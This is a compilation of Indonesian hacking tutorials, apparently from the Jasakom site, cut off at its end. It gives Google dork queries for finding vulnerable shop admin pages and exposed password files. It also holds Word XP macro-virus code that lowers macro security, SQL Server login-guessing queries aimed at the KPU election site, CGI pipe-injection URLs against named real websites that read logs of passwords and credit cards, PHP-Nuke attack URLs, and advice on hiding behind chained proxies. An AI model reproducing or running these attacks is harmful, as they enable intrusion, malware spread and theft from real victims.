    Dari ungkapan-ungkapan tersebut mungkin akan timbul pertanyaan ... memangnya Ada Apa dengan Google ? ... Loh kok enggak pake mesin pencari lain yah ?. .. Apa sih keunggulan yang diberikan oleh google? ..... Untuk menjawab pertanyaan-pertanyaan tersebut salah satu diantaranya adalah dengan menunjukkan bagaimana relevansi antara apa yang kita ingin cari dengan apa yang dihasilkan oleh suatu mesin pencari. Terdapat beberapa penelitian yang telah dilakukan orang yang mencoba membandingkan hasil pencarian yang dilakukan google dengan mesin pencari lain. Salah satunya adalah penelitian yang dilakukan oleh Salokhe et al (2003, FAO-UN, Food and Agriculture Organizaion – United Nation) yang mencoba membandingkan kinerja google dan metacrawler dalam melakukan pencarian untuk database AGRIS yang dimiliki FAO. Hasil penelitan tersebut menunjukkan bawah google memberikan kualitas pencarian yang lebih baik dibanding metacrawler (he..he.. jadi serius nih).

    Selain memang kualitas hasil pencarian google yang baik, pilihan rekan-rekan untuk menggunakan google sebagai mesin pencari memang tidah salah. Coba lah pilihan interface h4x0r yang disediakan google di
      http://www.google.com/intl/xx-hacker/, seolah olah dengan menggunakan google kita sudah merasa jadi hacker (J, lol, walaupun hanya tulisannya). Dan untuk lebih meyakinkan lagi bahwa menggunakan google sebagai mesin pencari kita memang pilihan yang tepat coba juga lihat disalah satu pertanyaan dan jawaban dalam FAQ yang disediakan google sendiri seperti tertera di bawah ini:

    ---------------------------------------------------------------------------------------------------------
    “Mengapa Googlebot mendownload informasi dari web server "rahasia" saya? Hampir-hampir mustahil untuk menjaga merahasiakan sebuah web server dengan cara tidak mempublikasikan link apapun ke halaman itu. Begitu ada orang yang mengikuti sebuah link dari server "rahasia" Anda ke web server lain, tampaknya URL
    "rahasia" Anda ada pada tag referalnya, dan bisa disimpan dan mungkin diterbitkan oleh web server yang lain dalam log referalnya. Jadi, jika ada link ke web server atau halaman "rahasia" Anda di manapun di web, tampaknya Googlebot dan "penjaring web" lain akan menemukannya.

    -------------------------------------------------------------------------------------------------------------

    Apa yang bisa dilakukan dengan google ?

    Target utama kita menggunakan mesin pencari adalah mendapatkan
    informasi tertentu sesuai dengan tujuan kita. Nah,
    informasi-informasi apa saja yang bisa kita dapatkan dengan
    google adalah bentuk informasi berikut (selain pencarian
    informasi umum misalnya tutorial, white paper dll):
    § Menemukan target web yang dapat dieksploitasi dimana:
    § Target tersebut menjalankan sistem informasi tertentu
    § Target tersebut menjalankan software web server tertentu
    § Target tersebut memiliki kelemahan/hole (vunerabilities) tertentu
    § Target tersebut memiliki data sensitif di dalam direktori publik
    § Target tersebut memiliki data sensitif di dalam file publik
    § Selain hal di atas kita juga bisa memanfaatkan google misalnya sebagai server proxy (bagaimana caranya akan dibahas di bagian selanjutnya, walaupun tidak sebagai anonymous proxy), menghasilkan hal-hal yang lucu dari hasil pencariannya, dan banyak lagi hal lainnya dengan memanfaatkan fitur-fitur yang sediakan oleh google (Cobalah situs berikut http://douweosinga.com/projects/googlehacks yang memanfaatkan fitur Web API google untuk membuat kalimat otomatis, membuat kalimat dalam gambar dan lain sebagainya).

    Syntax dan Fitur-fitur yang disediakan google
    Untuk mendapatkan apa yang bisa dilakukan dengan google ada baiknya kita mengenali syntax yang disediakan oleh google untuk membantu melakukan pencarian. Secara default google mengunakan operand AND apabila kita melakukan pencarian dengan lebih dari satu kata. Untuk pencarian dalam bentuk frasa maka kita harus menggunakan tanda kutip yang melingkupi kata kunci yang kita masukkan. Sedangkan untuk memaksa google agar tetap memasukkan kata-kata umum (misal how, of, for, dll) dalam sistem pencariannya maka kita harus menggunakan tanda plus (+) di depan kata yang umum tersebut. Syntax-syntax ini digunakan secara langsung dalam kolom pencarian dan penggunaannya dapat dikombinasikan. Adapun syntax-syntax lain yang sangat membantu pula dalam pencarian adalah sebagai berikut:

    FieldTujuan Penggunaanintitle:Menemukan halaman-halaman web yang di dalam title HTML-nya mengandung katakunci (keyword) yang kita masukkan. Contoh intitle:search berarti akan menemukan halaman yang didalam title HTML-nya mengandung kata search’inurl:Menemukan URL (host, nama path, nama file)yang
    memiliki kata kunci yang kita masukkan. filetype:Menemukan tipe file tertentusite:Menemukan halaman pada situs tertentulink:menemukan halaman yang memiliki hiperteks link ke URL tertentu
    Dan beberapa syntax lain bisa lihat di 

    http://www.googleguide.com/advanced_operators.html


    Terdapat banyak fitur disediakan oleh google untuk lebih membantu kita sebagai pengguna dalam mendapatkan informasi yang diinginkan. Dari halaman depan google, kita bisa melakukan pencarian gambar melalui pilihan ‘images’, melakukan pencarian arsip dikusi di USENET melalui pilihan ‘groups’, ataupun melakukan pencarian berdasar topik tertentu melalui pilihan ‘directory’. Fitur lainnya akan tampak apabila kita klik menu ‘more’ dalam tampilan awal google. Fitur-fitur tersebut diantaranya fitur translate tool, fitur Web API dan lain sebagainya.


    Dimana letak seninya googling ?
    Seni dari googling terletak pada kreativitas kita dalam mengolah/memanfaatkan kata kunci dan fitur yang disediakan google sehingga dapat menghasilkan hal/informasi yang umum ataupun tidak umum. Agar lebih jelas bagaimana kita melakukannya, bagian selanjutnya dari tulisan ini akan memberikan contoh dari penggunaan fitur dan kata kunci tersebut.

    Google sebagai proxy. Kita dapat menjadikan google sebagai proxy server dengan memanfaatkan fasilitas translate. Walaupun google proxy ini tidak bersifat anonymous, tetapi siapa tahu dengan menggunakan proxy google akses menjadi agak lebih cepat terhadap suatu site (karena sifat connectionless oriented dari protocol IP) atau cukup bisa mengelabui admin yang kurang teliti. Untuk melakukan hal di atas kita bisa memilih menu more dalam google atau menggunakan url berikut http://www.google.com/language_tools?hl=en . Untuk situs yang
    berbahasa indonesia, tinggal kita masukkan saja url-nya pada bagian translate web atau masukkan dalam url berikut
    http://translate.google.com/translate?u=http//www.situstarget.com&langpair=id|id
     
    . Untuk situs-situs yang berbahasa inggris, tinggal ganti id|id menjadi en|en (sebenarnya untuk situs yang berbahasa Indonesia bagian ujung dari url bebas tidak harus id|id). Sebagai contoh situs target, biasanya saya senang menggunakan jasakom karena menyediakan script untuk menampilkan proxy kita.

    Tanpa GoogleDengan Google
    www.jasakom.comhttp://translate.google.com/translate?u=http://www.jasakom.com&langpair=id|id

    Mecari target untuk suatu eksploit yang ditemukan. Contoh-contoh untuk kemampuan google yang satu ini sudah banyak diketengahkan di situs jasakom. Biasanya syntax yang dipakai adalah “inurl:” plus yang lainnya . Misal kita menemukan bahwa VP-ASP (Virtual Programming - ASP) sebagai salah satu shooping cart yang dikenal di Eropa dan US untuk membuat toko online memiliki kelemahan pada script halaman adminnya. Kelemahan tersebut adalah script adminstrasinya bisa di XSS dan di Injeksi SQL (http://securitytracker.com/alerts/2002/May/1004384.html). 

    Dengan melakukan XSS atau SQL injection terhadap script inidapat memperlihatkan detail data credit card dari pelanggan. Adapun script administrasinya ada di file shopadmin.asp. Lalu, bagaimana mencari target yang memiliki kelemahan ini, caranya adalah dengan menggunakan keyword berikut pada google
    -- inurl:shopadmin.asp “shop adminstrators only” ---
    http://www.google.com/search?hl=en&lr=&ie=UTF-8&&q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22
    .


    Menemukan password. Sesuatu yang harusnya tidak untuk diketahui untuk umum, semacam password dan lainnya, karena adanya sedikit kesalahan dalam setting atau lainnya, atau juga karena adanya keinginan orang untuk berbagi, memberikan kesempatan pada google untuk menemukan hal seperti ini. Contoh untuk pencarian password dengan google misalnya dengan mencari file password yang memiliki nama password juga dengan tipe file mungkin txt juga mungkin dat. Kita ambil contoh keyword --- filetype:dat “password.dat” -- http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Adat+%22password.dat%22 . (jika ditemukan password yang dienkripsi, silahkan
    deskripsi dengan JTR atau program yang lainnya. Lebih mudah untuk melihat hasil pencarian dengan mengikut link “cached” dari google). Keyword lain yang dapat digunakan -- filetype:bak inurl:"htaccess|passwd|shadow|htusers" -- , --- "# -FrontPage-" inurl:service.pwd --

    Bagaimana mencari password yang dishare orang lain (pihak ketiga) terutama untuk situs yang ehmm ehmm ;). Situs-situs tersebut biasanya di authenticasi dengan cara standar yang memungkinkan kita melakukan akses dengan mengetikan pada address bar menggunakan pola ‘http://xxxxx:xxxxxx@www.hehehe.com/members’. Untuk itu, bisa kita coba dengan mengetikkan keyword frasa berikut pada google
    -- “http://*:*@www”—untuk tambahan query bisa kita tambahkan
    setelah frasa dengan nama situsnya misal ..... (silahkan tebak sendiri he...he..)

    Melihat direktori tertentu dari suatu site. Suatu site yang tidak terkonfigurasi dengan baik akan memungkinkan google dapat menampilkan struktur file yang mungkin cukup sensitif. Keyword untuk tujuan ini biasanya menggunakan frasa “index of”. Contoh keywordnya adalah -- intitle:"index.of.secure" -- intitle:"index.of.secure" – intitle:’index of cgi-bin” --- .

    Mencari kelemahan suatu server dari hasil kerja orang lain.
    Untuk menemukan informasi kondisi suatu server, kadang-kadang
    kita tidak perlu melakukan sendiri scanning terhadap server
    tersebut. Kita bisa mecari bagaimana profil suatu server
    menggunakan google berdasarkan laporan dari pihak lain yant
    telah melakukan assesment untuk suatu serve. Bisa dicoba
    sontohnya dengan keyword berikut -- filetype:pdf "Assessment
    Report" nessus –

    Penutup
    Apa yang diketengahkan di atas hanya sebagian kecil dari kreativitas mengolah keyword untuk google. Masih banyak lagi yang belum dinyatakan dalam tulisan ini yang mungkinrekan-rekan telah ketahui sebelumnya atau mungkin rekan-rekan sendiri yang punya ide baru dalam mengolah keyword untuk google. Dan yang pasti, koleksi terbanyak ada di net sana (coba – filetype:txt inurl:googletut1 -- )

    Acknowledgement
    Keyword-keyword di atas dikenal dengan istilah “googledork”  yang dicetuskan oleh j0hnny dari ihackstuff. Thanks to j0hnny. Rujukan utama tulisan ini adalah tulisan dari j0hnny. Terima kasih pula untuk rekan-rekan yang ungkapannya untuk google saya kutip untuk tulisan ini serta kepada penulis lain yang papernya digunakan dalam menyusun tulisan ini. Tidak lupa pada jasakom yang menyediakan script uji coba dan mau menampilkan paper ini.

    kahartospisan [at] yahoo.com
    Berikan Pendapat Anda Untuk Artikel Ini

    Teknik pembuatan virus makro pada Microsoft Word XP

    (Ih judulnya formal banget) Sebenarnya artikel ini dibuat karena saya tertarik dengan artikel sevenC, tentang
    pembahasannya membuat virus makro pada Microsoft Word 2000.

    Tetapi karena sistem keamanan Microsoft Word XP berbeda dengan Microsoft Word 2000, maka saya ingin mengulas sedikit tentang teknik peng-copyan modulnya. Sebelumnya coba lihat dulu sebagian source kode ini: 

    System.PrivateProfileString 
    ("","HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security",
    "Level") = 1& On Error Resume Next
    Set NorTemp = NormalTemplate.VBProject
    Set Aktif = ActiveDocument.VBProject
    Set modulbaru =  ActiveDocument.VBProject.VBComponents.Add(vbext_ct_StdModule)
    If modulbaru.Name <> "coba" Thenmodulbaru.Name = "coba"
    If (ActiveDocument.VBProject.VBComponents.Count < 2) And (ActiveDocument.VBProject.VBComponents.Count >= 1) Then
    Else:
    eror
    End if
    On Error Resume Next
    NormalTemplate.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")Set NorTemp = NormalTemplate.VBProject
    On Error Resume Next
    ActiveDocument.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

    Dalam Microsoft Word XP Registry untuk membuat rendah sistem keamanan macro security-nya hampir sama dengan Microsoft Word 2000, yang membedakan hanya versi yang tertera pada registry tersebut.

    Pada Microsoft Word 2000:
    System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
    "Level") = 1&

    Pada Microsoft Word XP:
    System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security",
    "Level") = 1&

    Kelihatan kan perbedaanya hanya pada versinya saja

    - Untuk teknik pembuatan module antar dokumen yang aktif hampir sama, cuma saya disini memakai syntax yang berbeda dengan sevenC (hi..hi..hi), bisa dilihat pada source code di bawah ni :

    On Error Resume Next
    Set NorTemp = NormalTemplate.VBProject
    Set Aktif = ActiveDocument.VBProject
    Set modulbaru =
    ActiveDocument.VBProject.VBComponents.Add(vbext_ct_StdModule)
    If modulbaru.Name <> "coba" Then
    modulbaru.Name = "coba"

    -kalau sudah untuk mencegah agar virus tidak menulari dokumen tersebut 2 kali tambahkan perintah:
    If (ActiveDocument.VBProject.VBComponents.Count < 2) And (ActiveDocument.VBProject.VBComponents.Count >= 1) Then

    'routine infeksi

    Else:
    eror --> sub error handler yang dibuat dengan membuat subkosong, contoh

    sub eror()
    'kalian bisa memasukkan perintah apa saja di sini, kalau saya lebih suka kosong sih hihhi...end sub

    MASALAH:
    Tetapi untuk menjalankan routine ini kita harus menyalakanLibrari Microsoft Visual Basic for Applications Extensibility 5.03 yang ada pada Visual basic Editor di Menu 'tools', sub menu 'reference'. Bila kita tidak memakai librari tersebut akan memunculkan pesan error. Gimana dong cara menyalakannya dengan otomatis tanpa harus mengklik menu tsb pada Word?

    SOLUSI:
    Masuk ke Visual Basic Editor,ke menu tools, reference, cari library yang bernama Microsoft Visual Basic for Applications Extensibility 5.03, kemudian klik, dan keluar dari menu tersebut.dan Jalankan source kode.

    atau dengan cara tersembunyi yaitu dengan menggunakan file vbe6ext.olb yang ada pada path C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\ , karena file tersebut yang dapat menjalankan type library untuk Microsoft Visual Basic for Applications Extensibility 5.03, maka ketikkan :

    On Error Resume Next
    NormalTemplate.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")Set NorTemp = NormalTemplate.VBProject

    kalau yang diatas untuk mengeset normal templatenya, sedangkan yang ini untuk mengeset agar Microsoft Visual Basic for Applications Extensibility 5.03 aktif di dokumen yang lagi aktif :

    On Error Resume Next

    ActiveDocument.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6ext.olb")

    Wah....selesai degh....kamu bisa masuk ke Microsoft Office XP  dengan routine tersebut, terserah penyebarannya mau dengan  memakai .bat, atau dengan worm, up to you.....makasih buat saran kritik n caci maki....

    "in digital century someone can be a famous in ten minute"-->  deu nyontek bo.....

    Thanks to:

    - created by :
    SPY-ONO|LAGI|MAEN
    Berikan Pendapat Anda Untuk Artikel Ini

    rahasia teknik serangan SQL injenction

    Bagaimana teknik serangan SQL Injection pada TNP KPU? Sebelum mulai mempelajarinya, silakan download terlebi dahulu 2 tools yang tersedia, yaitu Query sederhana dan SQLCommand.
    Untuk mendownload tools Query sederhana: 


    http://tnpkpu.europe.webmatrixhosting.net/download/CSPHJRM5NV2GSJSD.zip

    Untuk mendownload tools SQL Command:
    http://tnpkpu.europe.webmatrixhosting.net/download/H4KDIF6T7NTJIFDQ.zip

     
    Kedua tools ini memiliki ekstensi .hta yang merupakan HTML application. Cara menggunakannya:

    • pastikan komputer anda terkoneksi ke internet,
    • buka filenya dengan dobel-klik,
    • ketik syntax SQL-nya pada kotak yang tersedia,
    • klik "Execute Query" dan tunggu hingga proses selesai.
    Berikut ini beberapa SQL script yang dapat digunakan pada tools Query Sederhana.

    Untuk melihat list table:
    SELECT [name] FROM sysobjects WHERE [type]='U' or [type]='S'

    Untuk melihat disain table: 

    SELECT A.[colorder], A.[name], C.[name], A.[length],
    A.[xprec], A.[xscale] FROM syscolumns A INNER JOIN sysobjects
    B ON A.id=B.id INNER JOIN systypes C ON A.xtype=C.xtype WHERE
    B.[name]='partai'

    Untuk melihat list view:
    SELECT [name] FROM sysobjects WHERE [type]='V'

    Untuk melihat disain view:
    SELECT A.[name], B.[text] FROM sysobjects A INNER JOIN
    syscomments B ON A.id=B.id WHERE A.[type]='V'

    Untuk melihat list stored procedure:
    SELECT [name] FROM sysobjects WHERE [type]='P'

    Untuk melihat disain stored procedure:
    SELECT A.[name], B.[text] FROM sysobjects A INNER JOIN
    syscomments B ON A.id=B.id WHERE A.[type]='P'

    Untuk melihat list user:
    SELECT [name], [hasdbaccess], [islogin], [isntname],
    [isntgroup], [isntuser], [issqluser], issqlrole FROM sysusers

    Untuk mencocokan/mencoba-coba user id dan password:
    SELECT uid FROM OPENROWSET('SQLOLEDB','TNP';'sa';'tnp','SELECT
    user_name() as uid')

    SELECT uid FROM
    OPENROWSET('SQLOLEDB','TNP';'reportmaker02';'reportmaker','SELECT
    user_name() as uid')

    Sementara untuk perintah 

    CREATE TABLE, INSERT, UPDATE, DELETE,
    DROP TABLE dapat menggunakan tools SQL command. Cara penggunaannya dapat dilihat dari contoh yang diberikan pada tools tersebut.

    Dengan tools ini kita dapat mempelajari serangan SQL Injection pada TNP KPU. Tools ini dapat diedit dengan notepad bila Anda ingin memodifikasi source code-nya.

    Selamat mencoba.

    Ragam Hacking Menggunakan Google

    Google dalam mencari celah keamanan website.

    Jika Google menemukan alur data yang dapat mengekspos  informasi sensitif mengenai organisasi anda, Google tidak akan ragu-ragu mengindeksnya. Mesin pencari ini tidak membedakan data yang diindeknya. Apa yang sebaiknya anda lakukan jika rahasia anda bocor ke publik? 

    Anda dapat menggunakan Googleuntuk keuntungan anda melalui beberapa query pencarian yang spesifik. Inspirasi contoh tersebut dapat dilihat pada artikel dari Johnny Long. Dalam artikel ini Nitesh Dhanjani (konsultan keamanan IT) ini juga akan menunjukkan kepada anda bagaimana cara menggunakan Google API untuk otomasi proses pencarian Google terhadap berbagai celah keamanan. Artikel ini terinspirasi dari situs
      http://johnny.ihackstuff.com tentang cara mendayagunakan  Google dalam mencari celah keamanan website.

    Jika Google menemukan alur data yang dapat mengekspos informasi sensitif mengenai organisasi anda, Google tidak akan ragu-ragu mengindeksnya. Mesin pencari ini tidak membedakan data yang diindeknya. Apa yang sebaiknya anda lakukan jika rahasia anda bocor ke publik? Anda dapat menggunakan Google
    untuk keuntungan anda melalui beberapa query pencarian yang spesifik. Inspirasi contoh tersebut dapat dilihat pada artikel dari Johnny Long. Dalam artikel ini Nitesh Dhanjani (konsultan keamanan IT) ini juga akan menunjukkan kepada anda bagaimana cara menggunakan Google API untuk otomasi proses pencarian Google terhadap berbagai celah keamanan.

    Penjebolan Sites yang menggunakan dasar Unix

    Ada pepatah bilang dari jauh bahawa “Microsoft bukan segalanya”, ternya pepatah itu juga berlaku pada rekan Vs nya bahwa UNIX bukan pula sebaliknya.
    Ok udah dulu basa-basinya.. bug pada CGI seperti dalam sites berPlatfrom Unix disini hanya masalah scripts
    http://www.grandprix.net/cgi-bin/99.cgi?file=|ls%20+/home| pada waktu dilihat secara sekilas memang dapat dilihat bahwa  sites ini menggunakan Platfrom NT ===è “ /cgi-bin/99.cgi?” ç=== disini bisa dilihat karakteristik sites berplatfrom NT.

    Tapi ternyata dengan adanya tambahan extention seperti =è ?file=|ls%20+/home| dibelakangnya.....apa yang terjadi...kita bisa mengaccessnya dengan menambahkan perintah-perintah Unix/Linux dibelakangnya dengan parameter” | | ” pada posisi depan dan pada penutupnya contoh “|ls%20+/home| “dan setiap penambahan direktori yg mau dibuka tambahkan “ / “ contoh seperti dibawah. Dan untuk mengakses, kita bisa menggunakan  perintah ls / dir (dlm istilah command Linux) untuk membuka isi semua direktori yang ada. Dan untuk membaca isi file kita dapat menggunakan peritah vi / pico dll. (%20+) jangan sampai tidak dipakai , karena itu menyatakan space setelah command.
    Contoh seperti ini:

    http://www.grandprix.net/cgi-bin/99.cgi?file=|vi%20+/home/pfyc/websites/www.grandprix.net/cgi-bin.old/db/Data_files/profile.data|


    Untuk sekedar menambah suasana lain dalam masalah Hacking,  jadi mungkin lebih pantasnya artikel ini saya tujukan untuk para newbies yang sampai detik ini pastik semakin bertambah besar rasa ingin tahunya........


    Thanks banyak 2 : All in Neoteker (my inspiration)– r3v0lt dengan sisilainnya-Jangkr|k-xfont-k4m353n1n-dan semua chanel #neoteker #indohack #thacc #thecc #rumpunbambu #bengkulu
    #pekanbaru (chanel 2 santai) dll.....thanks semua..


    Saya berjanji akan selalu memberikan sesuatu yang lebih bermanfaat lagi... Pesan 2 newbies : janganlah mencoba untuk merusak/merugikan orang lain jadilah Hacker yang baik.......

    0==[=======> salam from 0=={=======>
    ne0rganicz
    Berikan Pendapat Anda Untuk Artikel Ini

    Password Dan Login Pada Yahoo Dan Kelemahan Pada .CGI

    Jasakom - Sebelumnya saya mohon maaf bila ada kurang lebihnya tutorial ini dan saya ingin sekali mengucapkan dan bersyukur kepada Tuhan yang telah memberi nafas hingga sekarang ini.

    Saya melihat dari bug lama yaitu http://target.com/cgi-bin/go.cgi?go=|id| dan kenapa selalu itu
    dan udah saya bahas di #malanghackerlink bahwa yang *.cgi dan *.pl ( ini yang belum saya bahas)
    contoh:
    http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|
    http://www.2pac2k.de/cgi-bin/articles.pl?111-1.txt|id|

    Diatas ada 2 Contoh dan mungkin anda bisa mengembangkan sendiri xxx.cgi atau xxx.pl belakangnya kan tinggal tambah |id| dan selanjutnya terserah anda :))Lah ini yang di cari² membobol password Yahoo padahal ini triks atau tehnik aja kita enggak memakai sofware seperti brute password atau crack password kita pakai cara gampang aja dan pakai logika. Password biasanya sering sama dengan login dan bila kita mendapat Target seperti diatas kita harusnya mempelajari system dia dan biasanya para kawan ku sering install eggdrop atau psybnc atau di buat ngeroot heheeheh iya engak kalian tau sebenarnya di dalem system dia kita bisa dapet pass mail yang telah mendaftar ke web/situs dia .

    Contoh:
    http://www.target.com/software/cgi-bin/xxx.cgi?file=/software/pressclips.html|cat%20/home/shoplet/libs/acct_info.log%20/home/shoplet/libs/reorder.log|

    Disana saya menemukan password dan login email yahoo atau msn atau hotmail.

    Hehehe Didalam nya ada Paypal nya dan CC nya serem kan hehe saya menemukan hampir 300 mail di dalamnya dan memang semuanya hampir Complete login + password order log dia jadi kalau kita suka order buat apa susah² order langsung aja login ke toko shop dia dan kirim barang heheh ada juga saya menemukan login Ebay serem deh pokok nya.....

    Tutorial BY : Sincan2 #malanghackerlink Crew

    Meng-hack PHP-BUg's

    Hallo jumpa lagi dengan saya si NEO_DOANK, |N|E|O| it's same person ok'deh sekarang saya lagi membahas Bug yang terdapat pada PHP-nuke VERSION: 6.x, 7.2, 7.3 selengkapnyasilahkan lihat deh hehehehehe. :)
    Time To Hack Broo
    _____________________________________

    Di sini saya tidak membahas mengenai bug script nya Mohon maaf ya soalnya demi keamanan, PHP-nuke di Indonesia, kalo di luar indonesia boleh deh di test.

    Script tersebut memanfaatkan celah pada sistem pehp bug di mana kita sebagai seorang "anonymous" bisa naik pangkatnya menjadi user biasa malah Admin sekaligus di mana kita bisa read dan write. disini saya akan memberikan contoh2 web yang telah di attack:

    http://www.astronomy.org.il/modules.php? name=Reviews&rop=postcomment&id=0&title=
    http://www.cakes-r-us.com/modules.php?name=Reviews&rop=postcomment&id=0&title=
    http://moome.xplosiv-hosting.com/site/modules.php?name=Reviews&rop=postcomment&id=&title=
    http://schoolsucks.co.il/modules.php?name=Reviews&rop=postcomment&id=0&title=


    anda tinggal copy dan pastekan ke IE' ato apa sajah (menurut Browser anda) dan Jreeng buat deh hehehe kata2 anda terserah apa saja. Ada juga Lho yangdi indonesia (demi keamanan tidak di perlihatkan)
    _____________________________________
    untuk solusinya menghindarkan web anda dari secript saya yaitu
    :

    ganti deh PHP-nuke versi 6.x, 7.2, 7.3 (jika anda memakai
    versi ini)'' atau saya dengan mudah memasukkan kata-kata apa
    saja ke Web anda" :P
    ---------------------------------------------------------------------------------------------------
    ada neh target yang laen kalau mau tinggal mail saja saya (asal jgn di INDONESIA ya) mail saya ke kollop_crk@yahoo.com
    Thank's To dark Bicho''' and etc''''''#hacker on Undernet,

    Berikan Pendapat Anda Untuk Artikel Ini

    Meng-Hack Pesawat Telepon Yang Terkunci

    Akhir- akhir ini pesawat telphone menjadi salah satu bentuk kebutuhan kita untuk berkomunikasi, apa lagi saat kita ada keperluan mendadak untuk menghubungi kerabat kita.

    Jika suatu saat kita inggin menggunakan pesawat telephone, namun pesawat telephonenya terkunci dan kuncinya di sembunyikan , jangan khawatir karena kita masih bisa menggunakan pesawat telephonenya.

    Saya mau bagi bagi sedikit ilmu , bagaimanan caranya kita bisa  menggunakan telphone walau telephonenya sedang terkunci ( lock  ).

    1. Periksa dulu bagian belakang pesawat telphone kamu. jika  terbuka kuncinya, pakek aja. jika dalam keaadan terkunci,  ikutin langkah selanjutnya.
    2. Angkat gagang telephonenya.
    3. Lalu kamu lihat tombol dialnya yang biasa untuk memutuskan  telephonnya
    4. kamu tekan tekan tuh dialnya dengan cepat .

    petunjuk nomor:
    " 1" ( 1 kali ) , "2" ( 2 kali ) ," 3"( tiga kali )  dst......................s/d "9"( sembilan kali ) untuk angka " 0 " ( sepuluh kali ).

    Contoh: " 7359463 " ( tujuh kali, tiga kali , lima kali,  sembilan kali, empat kali, enam kali, tiga kali )

    SELAMAT MENCOBA........!!!!!!!
    Efek sampingnya ini hanya mengaktifkan pesawat telphone sedangkan pulsa telephone tetap berjalan selama anda berbicara.

    Mengelabui Pengejar Hacker

    Saya melihat kejanggalan dalam praktek pengejaran/penangkapan hacker yang menjebol situs web TNP KPU. Coba kita tinjau ulang data-data yang dimiliki oleh KPU:

    Log dari Firewall yang berisi data source IP Address dan port, destination IP Address dan port, dan mungkin data-data lainnya yang tersimpan di TCP/IP header. WWW Log dari web server yang berisi data IP Address
    pengunjung, tanggal dan jam berkunjung, browser yang digunakan, URL yang dibuka, ASP Session, cookies, dan mungkin data-data lainnya yang terkirim bersama HTTP header.

    Router Log dari ISP CBN yang berisi data IP Address yang melakukan koneksi TCP/IP ke proxy anonymous Thailand. Data-data log firewall kurang bermanfaat. Serangan telah teridentifikasi melalui port 80 HTTP. Data-data ini kurang mengarahkan pada si pelaku. Dari data WWW Log, KPU memperoleh IP Address hacker dengan  mencocokkan tanggal dan jam berkunjung serta URL yang berisi  SQL Injection untuk mengubah nama partai. Ternyata IP Address  ini adalah milik proxy server anonymous di Thailand. Untuk itu dibutuhkan data-data pengguna internet Indonesia yang sedang  koneksi ke proxy server Thailand ini.

    Dari log router CBN diperoleh data bahwa ada komputer yang  terkoneksi ke proxy server di Thailand.

    Sementara untuk log proxy server Thailand, tidak mungkin bisa  diperoleh oleh "Tim Pengejar Hacker" karena proxy server  Thailand ini memiliki sifat high anonymity. Maksudnya proxy  server ini tanpa log, memiliki IP Address proxy yang berbeda  dengan IP Address koneksi dimana IP Address koneksi berjumlah  lebih satu. Untuk transparant proxy, mungkin saja cara yang  digunakan "Si Pengejar" ini dapat berhasil. Namun untuk high  anonymous proxy mustahil bisa memastikan bahwa tersangka  adalah benar-benar "Sang Hacker".

    Penggunaan software SocksChain dari Ufasoft yang menghubungkan  sejumlah proxy server dapat mengakibatkan terhapusnya jejak  Sang Hacker. Misalkan saja si pelaku mengakses dari Indonesia
    kemudian menggunakan proxy server di Belgia, menyambungnya ke  proxy server di Argentina, Filipina, Thailand dan kemudian  terkoneksi ke web server KPU. Tentu saja yang tercatat di log  router adalah koneksi ke Belgia. Bagaimana bisa kita  mengejarnya?

    Akibatnya "Tim Pengejar Hacker" menempuh cara lain dengan melakukan social engineering pada sejumlah channel IRC yang  sedang membahas masalah ini. Ditemukan bahwa sebuah nickname  mengaku telah menjebol situs TNP. Setelah melalui proses "pengejaran" akhirnya tertangkaplah si pemilik nickname  tersebut, yang nama aslinya Dani Firmansyah dengan  bukti-bukti:
    • Pengakuan dari yang bersangkutan.
    • Log proxy server warnet tanggal 17/4 yang sudah dihapus.
    • Percobaan scan port dari server danareksa ke web server di  TNP.
    • Log router CBN pernah koneksi dari server danareksa ke proxy  server di Thailand.
    Mungkinkah penangkapan "Sang Hacker" ini hanyalah sebuah rekayasa? Benarkah Dani Firmansyah pelakunya?

    Saya menemukan sebuah "situs menarik" di search engine yang membahas masalah security KPU. Mungkin ada baiknya jika kita mengunjungi situs ini yang beralamat di:

    http://tnpkpu.europe.webmatrixhosting.net

    Berikan Pendapat Anda Untuk Artikel Ini

    MENGACAK-ACAK REGISTRY WARNET

    Tulisan ini saya buat selaku seorang newbie, itupun akibat kejengkelan dengan salah satu warnet di Aceh.Semua fasilitas direstric, mulai dari regedit, menu file, run, bahkan floppy A-nya pun di ambil

    Mana bisa tenang user pemakainya kalo begini-begini terus keadaannya. Huh…. Jadi sorry-sorry aja kalo anda merasa yang udah senior menerima tutorial ini. Jujur, saya adalah seorangnewbie, newbie yang imut dan lucu… newbie yang sangat manis, enggak percaya ???
    ------------------------------------------------------------------------------------------------------------
    Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu  di komputer warnet, eh... fasilitas find yang ada di warnet  dicomot, mau gunain dos eh dimatiin trus runnya diculik...  ih... kesel enggak dengan warnet kayak gini. Saya sih kesel  buangeet, tapi untung aja yang jaga warnetnya sediikit cakep  jadi ya... hehehe... tau sendiri lah!.  Tetapi kadang-kadang setiap pergi ke warnet kayak gini kesel  juga, user benar-benar di batasi dan satu kunci untuk membuka  itu semua adalah REGISTRY. 

    Lalu bagaimana jika ternyata  registry warnet juga dikunci, ckkk...ckkk.... untuk itulah  saya membuka wawasan anda melalui artikel ini. Tidak perlu menjadi seorang yang expert jika hanya untuk menjebol  registry, diluar pakem... enggak juga tuh! 

    Memang sih ada tools yang digunaiin untuk mendukung aksi kita  ini, tetapi hampir disetiap warnet dan disetiap komputer tools  ini ada kok, cuma sebuah program text editor sederhana seperti  notepad, wordpad, kalau mau Microsoft Word juga bisa.
    Gimana... udah enggak sabar khan buat ngacak warnet dengan 4  langkah mudah... ITS SHOW TIME!!!
    Langkah pertama yaitu buka text editor kalian, lalu  copy-pastekan code berikut ini ke text-editor kalian:
    ----------------------------[ cut here the code
    ]------------------------------
    REGEDIT4
